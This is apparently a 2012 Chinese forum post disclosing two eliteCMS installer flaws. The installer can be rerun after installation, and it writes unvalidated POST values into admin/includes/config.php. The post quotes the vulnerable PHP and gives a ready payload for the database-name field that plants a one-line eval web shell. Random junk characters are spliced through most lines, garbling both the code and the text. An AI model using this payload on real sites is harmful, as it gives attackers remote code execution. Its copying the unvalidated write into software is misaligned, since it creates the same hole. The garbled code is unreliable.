eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装, U5 f. g" M5 F+ _
$ v8 d7 [' i1 H- C6 u# ^另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php- I$ ?# h* R+ d# b: O; O8 B
我们来看代码:
2 ]% J& w$ P: b9 A3 M. q" ?. C
0 h& ^4 v3 ^/ z6 W6 l6 t...5 D) L5 P$ m+ N. u, u$ z' K9 q2 X
elseif ($_GET['step'] == "4") {
, Q e% P4 X5 e* L5 u9 f5 J i $file = "../admin/includes/config.php";+ I$ R1 ]/ O! n5 t/ x3 ]
$write = "<?php\n";( b8 J4 F* ]; K
$write .= "/**\n";3 ?2 a/ o. M: n! g
$write .= "*\n";
# E5 Z5 b* j9 V $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";7 b1 I5 d# k: t* H! Q
...略...) G; V" _, s7 O9 `
$write .= "*\n";
8 }( l: r$ Y) v' k8 G $write .= "*/\n";
; j5 C. m9 O: M& n2 v) X+ \ $write .= "\n";
6 L; D$ W; e" D" g0 k1 P $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";* O9 f: \2 ?5 ]% a
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
- o% o, ]; U$ d5 M $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
: A3 V8 f' @2 `% m# X9 Q $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
2 Y( E' r6 @& l) R+ O* m $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
+ Y0 U7 s1 v3 [9 O$ L, E $write .= "if (!\$connection) {\n";
1 q3 J( x m1 r9 y5 a8 e. h $write .= " die(\"Database connection failed\" .mysql_error());\n";6 P8 r; b3 q" A* U! `
$write .= " \n";
* A( V! s$ ^+ h5 \& t $write .= "} \n";0 ]! w# O2 d$ }6 Z7 H
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
( V+ K; L$ t) a4 N# g $write .= "if (!\$db_select) {\n";) E; G- H5 [* h5 ?* c/ Q" N3 |
$write .= " die(\"Database select failed\" .mysql_error());\n";
+ ] F7 i! f7 y9 J! q $write .= " \n";5 u. R/ l1 W9 q! ]
$write .= "} \n";
6 N& a1 i4 @5 B( k' E$ p. ?' C1 [ $write .= "?>\n";
: ^; q0 W- T: g7 ^! z4 q& \$ n
m. x7 K0 c7 [# d) V. O $writer = fopen($file, 'w');0 Y7 k: ]6 w/ q! A- g& }
...
0 y/ }5 o% y' S$ F
2 [; `! U0 x' \3 u/ v, c在看代码:4 `9 J& O% w( W0 J) e
" l9 P* [* `( [. l; G& r9 T0 A
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
) A4 d( K1 M2 u7 C7 Q8 ^$_SESSION['DB_NAME'] = $_POST['DB_NAME'];& s" a) c# k9 c( q9 \
$_SESSION['DB_USER'] = $_POST['DB_USER'];/ p$ D; c( I# M* ]8 R6 _
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];) M- S& w q7 U$ F
6 v- y3 M% l7 R- b! ~2 w" F取值未作任何验证% n6 I) L& B# b# V3 K' [
如果将数据库名POST数据:3 b+ d9 x* H) j; ?; @
+ ?. q% U* v2 m4 f% ^2 |) T
"?><?php eval($_POST[c]);?><?php$ u& A A1 A' k6 e5 ]0 K" b- f
4 t# ?) H2 ]9 M5 O) ~) ] T; z将导致一句话后门写入/admin/includes/config.php
" `! H" B( n/ S7 |+ v3 d |
发表于 2012-11-18 13:59:27
收藏
支持
反对